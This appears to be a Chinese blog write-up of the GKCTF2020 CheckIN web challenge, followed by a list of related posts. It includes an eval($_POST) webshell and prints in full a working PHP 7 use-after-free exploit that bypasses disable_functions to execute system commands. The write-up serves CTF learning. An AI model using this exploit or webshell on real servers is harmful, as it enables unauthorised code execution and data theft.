GKCTF2020 checkin

最新推荐文章于 2023-08-21 20:47:58 发布
最新推荐文章于 2023-08-21 20:47:58 发布
阅读量351 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/118118208
版权

写在前面

最近快期末考了 拼搏20天 我要上大二
每天晚上会找时间刷一下CTF

GKCTF2020 CheckIN

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

咋一看是个命令执行 try try

没ban print_r

print_r(glob('/*'));

可以用

Array ( [0] => /bin [1] => /boot [2] => /dev [3] => /etc [4] => /flag [5] => /home [6] => /lib [7] => /lib64 [8] => /media [9] => /mnt [10] => /opt [11] => /proc [12] => /readflag [13] => /root [14] => /run [15] => /sbin [16] => /srv [17] => /start.sh [18] => /sys [19] => /tmp [20] => /usr [21] => /var )

想办法看一下 /flag 和 /readflag

$handle=fopen('/readflag','r');echo fread($handle,1000);

include 也可以。。。
可以看 /readflag 但是会乱码?
而且 /flag 读不出来 权限不够??? 需要来一个提权???

emmm 总之 先把 system 搞出来? 或者搞个shell?

用了ctfshow群主给的poc 没绕过去。。。
emmmm 突然发现是忘了url编码
等我base64 再 url 编码后 结果414 too-large woc

把空格给删掉。。。

还太大 我心太炸了

zhizhang的我 现在才想起来翻 phpinfo();

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,

转换个思路 file_put_contents(); … 不能用
试试别的写入函数?
写不进去 估计是没有权限???

突然想到 可以直接连shell 我是sb

eval($_POST[cmd]);

woshisb
woshisb
woshisb

连上后 发现权限不够
再次拿出 刚才过长的poc。。。写在 /tmp 目录下
直接pwn
之后我直接 include 结果爆

 ?Ginkgo=include('/tmp/pwn.php');

Couldn’t determine binary base address

看的我一脸问号
emmm

换了个 可能是我以前记得的有什么问题。。。

<?php
pwn("/readflag"); 
function pwn($cmd) {
    global $abc, $helper;
 
    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }
 
    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }
 
    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }
 
    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }
 
    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);
 
        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);
 
        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);
 
            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }
 
        if(!$data_addr || !$text_size || !$data_size)
            return false;
 
        return [$data_addr, $text_size, $data_size];
    }
 
    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;
 
            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;
 
            return $data_addr + $i * 8;
        }
    }
 
    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }
 
    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);
 
            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }
 
    class ryat {
        var $ryat;
        var $chtg;
        
        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }
 
    class Helper {
        public $a, $b, $c, $d;
    }
 
    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }
 
    $n_alloc = 10; # increase this value if you get segfaults
 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);
 
    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();
 
    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];
 
    $helper = new Helper;
    $helper->b = function ($x) { };
 
    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }
 
    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;
 
    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);
 
    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);
 
    $closure_obj = str2ptr($abc, 0x20);
 
    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }
 
    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }
 
    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }
 
    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }
 
    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }
 
    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
 
    ($helper->b)($cmd);
 
    exit();
}

再包含这个文件成功读到flag

总结

都快大二了 做这样的题还是不能完全独立做出来 真的是太水了 呜呜呜
希望能快快变强

b1ue0cean
关注
专栏目录
【学习笔记 22】 buu [GKCTF2020]CheckIN
weixin_43553654的博客
06-25 616
0x00 知识点 任意文件写入漏洞,部分过滤的绕过 0x01 解题过程 打开一看,代码审计 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $th
GKCTF2020 - Web(CheckIN)
ximo的博客
03-16 301
CheckIN 题目,代码审计: <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&gt
每日练习-[GKCTF 2020]CheckIN
m0_68113265的博客
08-21 164
本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,disable_function禁用了大多函数,可以使用蚁剑插件进行绕过。php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS。当同时一个参数名,越往后的可以覆盖前面的参数。C代表$_COOKIE。S代表$_SERVER。
[GKCTF2020]CheckIN
qq_45691294的博客
09-25 392
打开题目,直接得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gink
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 2156
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
第二周任务[GKCTF2020]
Lumos427的博客
03-26 638
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 639
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
GKCTF2020 web+misc
xlcvv的博客
05-25 1367
CheckIN(unsolved) 考点:代码审计,绕disable_functions 题目给了源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() {
[GKCTF2020]CheckIN -wp
freerats的博客
06-06 1229
向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。 发现没有问题,发现一大堆被禁的函数,php版本为7.3。 接下来看看能不能穿一句话上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然后用蚁剑连接 可以看到flag和readflag; 权限不够无法打开flag,readflag打开也是一堆乱码。 这种情况一般就是通过执行readflag来获取flag。 接下来就要结合7.3版本,r
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 350
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
GKCTF2021 checkin
pondzhang的专栏
06-27 537
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
[GKCTF2020] web题-CheckIN
BROTHERYY的博客
07-29 620
复现环境:buuoj.cn 代码提示有eval函数可以执行base64加密代码 成功回显了phpinfo信息 编辑一句话上传 eval($_POST[1]); 根目录上有flag和readflag,但都没法访问,应该是权限不够 bypass disable_functions 该漏洞可以执行命令执行 exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 上传到有权限的目录/tmp ?Ginkg
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 550
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 465
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
BUU刷题--[GKCTF2020]CheckIN [网鼎杯 2020 朱雀组]phpweb
weixin_48631429的博客
12-02 413
[GKCTF2020]CheckIN 打开题目: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
re学习笔记(64)GKCTF2020-re-Check_1n|BabyDriver
逆向随笔
05-24 1704
Check_1n 第一题运行程序,提示输入开机密码 输入错误会提示密码错误,去IDA搜索字符串得到密码HelloWord 然后开机后运行 打砖块 程序即可得到flag 切换程序的时候用箭头上下左右,回车启动, BabyDriver 搜索字符串发现有一串类似迷宫的字符串 迷宫字符串长度是225,刚开始以为是1515的,分析了下代码发现是1614的,, 可以写程序画出迷宫来,然后就是按键的问题了,,,因为是sys文件,所以按键应该是键盘扫描码而不是ASCII码 在线键盘扫描码查询 下移是0x25也就是K
GKCTF2021_checkin
z1r0的博客
04-09 444
GKCTF2021_checkin 查看保护 简单题 有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li =
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值